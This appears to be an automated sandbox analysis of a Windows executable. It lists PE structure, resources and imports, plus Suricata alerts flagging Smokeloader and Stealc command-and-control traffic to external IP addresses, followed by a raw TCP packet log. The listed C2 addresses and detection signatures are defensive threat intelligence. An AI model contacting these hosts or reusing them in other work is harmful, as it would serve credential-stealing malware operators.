mov dword ptr [0041FA0Ch], 00000001h
mov eax, dword ptr [0041E004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041E008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C8h]

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cdc4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x25000	0x17978	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1b000	0x174	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x19b4f	0x19c00	ca09759a56bfbeed524b101fec93f40a	False	0.777002427184466	data	7.427181340563761	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1b000	0x2644	0x2800	e35c410e07d8187edf13152e46df7878	False	0.3318359375	data	4.811674457698979	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x6160	0x2000	a04e3c2ccee016c3e8d8ac9b6c0bee16	False	0.1854248046875	data	2.133984081459015	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25000	0x17978	0x17a00	70baa7c6651aef1480c69aff56bdb477	False	0.4749503968253968	data	5.388679410390647	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x37ca0	0x2	data			5.0
BIKIGOTECOSOCIWOZ	0x36c80	0xbf7	ASCII text, with very long lines (3063), with no line terminators	Turkish	Turkey	0.5994123408423114
CELOCIBUMOFON	0x37878	0x3fa	ASCII text, with very long lines (1018), with no line terminators	Turkish	Turkey	0.6335952848722987
RT_CURSOR	0x37ca8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x37dd8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x25990	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5882196162046909
RT_ICON	0x26838	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6683212996389891
RT_ICON	0x270e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.7217741935483871
RT_ICON	0x277a8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7615606936416185
RT_ICON	0x27d10	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5464730290456431
RT_ICON	0x2a2b8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6651031894934334
RT_ICON	0x2b360	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6819672131147541
RT_ICON	0x2bce8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.8093971631205674
RT_ICON	0x2c1c8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.4059168443496802
RT_ICON	0x2d070	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5676895306859205
RT_ICON	0x2d918	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6278801843317973
RT_ICON	0x2dfe0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6358381502890174
RT_ICON	0x2e548	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.4674015009380863
RT_ICON	0x2f5f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4487704918032787
RT_ICON	0x2ff78	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.49822695035460995
RT_ICON	0x30448	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.3419509594882729
RT_ICON	0x312f0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.463898916967509
RT_ICON	0x31b98	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.49942396313364057
RT_ICON	0x32260	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.5260115606936416
RT_ICON	0x327c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.42697095435684645
RT_ICON	0x34d70	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.4343339587242026
RT_ICON	0x35e18	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.43483606557377047
RT_ICON	0x367a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.449468085106383
RT_DIALOG	0x3a550	0x84	data			0.7651515151515151
RT_STRING	0x3a5d8	0x2b4	data			0.4956647398843931
RT_STRING	0x3a890	0x47e	data			0.46608695652173915
RT_STRING	0x3ad10	0x182	data			0.49222797927461137
RT_STRING	0x3ae98	0x782	data			0.41883454734651404
RT_STRING	0x3b620	0x6c2	data			0.4300578034682081
RT_STRING	0x3bce8	0x61e	data			0.43614303959131545
RT_STRING	0x3c308	0x5de	data			0.43275632490013316
RT_STRING	0x3c8e8	0x90	data			0.5833333333333334
RT_ACCELERATOR	0x37c78	0x28	data			1.025
RT_GROUP_CURSOR	0x3a380	0x22	data			1.088235294117647
RT_GROUP_ICON	0x36c08	0x76	data	Turkish	Turkey	0.6694915254237288
RT_GROUP_ICON	0x2c150	0x76	data	Turkish	Turkey	0.6610169491525424
RT_GROUP_ICON	0x303e0	0x68	data	Turkish	Turkey	0.7115384615384616
RT_VERSION	0x3a3a8	0x1a8	data			0.5919811320754716

Imports

DLL

Import

KERNEL32.dll

GetComputerNameA, GetNumaNodeProcessorMask, SearchPathW, DebugActiveProcessStop, GetDefaultCommConfigW, CallNamedPipeA, WriteConsoleOutputW, HeapAlloc, InterlockedDecrement, GlobalSize, GetEnvironmentStringsW, CreateDirectoryW, GetComputerNameW, GetModuleHandleW, GetConsoleAliasesLengthA, GetUserDefaultLangID, GetCommandLineA, GetSystemTimes, GlobalAlloc, LoadLibraryW, GetConsoleAliasExesLengthW, LeaveCriticalSection, SetConsoleMode, SetConsoleTitleA, InterlockedExchange, GetStartupInfoA, GetLastError, GetProcAddress, SetStdHandle, GetNumaHighestNodeNumber, LoadLibraryA, UnhandledExceptionFilter, WritePrivateProfileStringA, QueryDosDeviceW, FindNextChangeNotification, FoldStringW, GetModuleFileNameA, FreeEnvironmentStringsW, VirtualProtect, FindAtomW, CopyFileExA, MultiByteToWideChar, EncodePointer, DecodePointer, ExitProcess, HeapSetInformation, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, WriteFile, GetStdHandle, GetModuleFileNameW, HeapCreate, EnterCriticalSection, Sleep, HeapSize, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeW, HeapFree, RtlUnwind, HeapReAlloc, IsProcessorFeaturePresent, GetConsoleCP, GetConsoleMode, FlushFileBuffers, ReadFile, CloseHandle, WriteConsoleW, SetFilePointer, CreateFileW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-02T11:42:46.144858+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49755	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:06.074213+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49769	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:06.074213+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49769	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:35.566947+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49785	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:35.566947+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49785	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:51.699971+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49761	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:51.699971+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49761	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:36.818718+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49745	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:57.436085+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49765	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:46.246051+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49787	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:49.853566+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49759	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:41.739107+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49776	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:44.307397+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49753	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:44.307397+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49753	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:40.627412+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49749	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:53.089075+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49778	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:53.089075+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49778	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:35.445479+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49775	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:43.396127+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49752	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:20.269684+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49782	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:20.269684+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49782	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:33.077567+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49741	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:34.012823+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49742	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:34.012823+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49742	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:23.938544+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49773	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:47.094815+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49756	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:52.757802+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	49763	443	192.168.2.4	191.96.144.157
2024-09-02T11:45:30.435855+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49784	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:58.475161+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49766	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:07.581354+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49770	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:51.472671+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49788	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:14.633022+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49781	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:40.635665+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49786	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:29.123326+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49737	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:03.508358+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49779	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:34.926361+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49743	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:25.102743+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49783	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:25.102743+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49783	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:39.714288+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49748	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:32.133054+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49740	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:30.974304+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49739	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:30.974304+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49739	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:12.999244+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49771	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:57.213860+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49789	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:29.746264+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49774	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:04.318219+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49768	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:37.745024+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49746	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:37.745024+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49746	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:48.937036+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49758	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:48.937036+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49758	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:50.783382+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49760	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:35.855465+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49744	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:45.220522+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49754	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:30.050148+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49738	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:38.679783+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49747	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:47.294091+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49777	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:48.003225+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49757	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:48.003225+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	49757	80	192.168.2.4	102.189.104.201
2024-09-02T11:43:01.253746+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	49767	80	192.168.2.4	91.202.233.158
2024-09-02T11:42:41.556561+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49750	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:56.442991+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49764	80	192.168.2.4	102.189.104.201
2024-09-02T11:42:42.462385+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49751	80	192.168.2.4	102.189.104.201
2024-09-02T11:45:09.261012+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49780	80	192.168.2.4	102.189.104.201
2024-09-02T11:44:18.565696+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	49772	80	192.168.2.4	102.189.104.201

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2024 11:42:27.842297077 CEST	49737	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:27.847393036 CEST	80	49737	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:27.847475052 CEST	49737	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:27.847635984 CEST	49737	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:27.847656012 CEST	49737	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:27.854464054 CEST	80	49737	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:27.856517076 CEST	80	49737	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:29.123262882 CEST	80	49737	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:29.123277903 CEST	80	49737	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:29.123286963 CEST	80	49737	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:29.123296022 CEST	80	49737	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:29.123326063 CEST	49737	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:29.123342991 CEST	49737	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:29.124516010 CEST	49737	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:29.124516010 CEST	49737	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:29.126882076 CEST	49738	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:29.129291058 CEST	80	49737	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:29.131669044 CEST	80	49738	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:29.131728888 CEST	49738	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:29.131845951 CEST	49738	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:29.131867886 CEST	49738	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:29.137375116 CEST	80	49738	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:29.137382984 CEST	80	49738	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.049175024 CEST	80	49738	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.050087929 CEST	80	49738	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.050148010 CEST	49738	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.055702925 CEST	49738	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.058238983 CEST	49739	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.061912060 CEST	80	49738	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.063519001 CEST	80	49739	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.063581944 CEST	49739	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.063709021 CEST	49739	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.063725948 CEST	49739	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.068523884 CEST	80	49739	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.068533897 CEST	80	49739	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.973990917 CEST	80	49739	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.974237919 CEST	80	49739	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.974303961 CEST	49739	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.974339962 CEST	49739	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.976886034 CEST	49740	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.979115009 CEST	80	49739	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.981679916 CEST	80	49740	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.981756926 CEST	49740	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.981873035 CEST	49740	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.981898069 CEST	49740	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:30.986624002 CEST	80	49740	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:30.986681938 CEST	80	49740	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:32.132819891 CEST	80	49740	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:32.132908106 CEST	80	49740	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:32.132916927 CEST	80	49740	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:32.133054018 CEST	49740	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:32.133090019 CEST	80	49740	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:32.133135080 CEST	49740	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:32.136590004 CEST	49740	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:32.139934063 CEST	49741	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:32.141338110 CEST	80	49740	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:32.144747972 CEST	80	49741	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:32.144824982 CEST	49741	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:32.144936085 CEST	49741	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:32.144970894 CEST	49741	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:32.149687052 CEST	80	49741	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:32.149804115 CEST	80	49741	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:33.076257944 CEST	80	49741	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:33.077500105 CEST	80	49741	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:33.077567101 CEST	49741	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:33.077615976 CEST	49741	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:33.080332041 CEST	49742	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:33.082382917 CEST	80	49741	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:33.085098982 CEST	80	49742	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:33.085165977 CEST	49742	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:33.085263968 CEST	49742	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:33.085287094 CEST	49742	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:33.090102911 CEST	80	49742	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:33.090112925 CEST	80	49742	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.012614965 CEST	80	49742	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.012660980 CEST	80	49742	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.012823105 CEST	49742	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.012932062 CEST	49742	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.015577078 CEST	49743	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.017738104 CEST	80	49742	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.020361900 CEST	80	49743	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.020431995 CEST	49743	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.020538092 CEST	49743	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.020560026 CEST	49743	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.025583029 CEST	80	49743	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.025784969 CEST	80	49743	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.926078081 CEST	80	49743	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.926112890 CEST	80	49743	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.926361084 CEST	49743	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.926496029 CEST	49743	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.929214954 CEST	49744	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.931217909 CEST	80	49743	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.934041023 CEST	80	49744	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.934122086 CEST	49744	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.934243917 CEST	49744	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.934336901 CEST	49744	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:34.939122915 CEST	80	49744	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:34.939132929 CEST	80	49744	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:35.855348110 CEST	80	49744	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:35.855386972 CEST	80	49744	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:35.855464935 CEST	49744	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:35.855590105 CEST	49744	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:35.860368013 CEST	80	49744	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:35.882211924 CEST	49745	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:35.887007952 CEST	80	49745	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:35.887092113 CEST	49745	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:35.887342930 CEST	49745	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:35.887362957 CEST	49745	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:35.893050909 CEST	80	49745	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:35.893204927 CEST	80	49745	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:36.812870979 CEST	80	49745	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:36.818633080 CEST	80	49745	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:36.818717957 CEST	49745	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:36.818877935 CEST	49745	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:36.821197033 CEST	49746	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:36.823796988 CEST	80	49745	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:36.826725960 CEST	80	49746	102.189.104.201	192.168.2.4
Sep 2, 2024 11:42:36.826798916 CEST	49746	80	192.168.2.4	102.189.104.201
Sep 2, 2024 11:42:36.826921940 CEST	49746	80	192.168.2.4	102.189.104.201
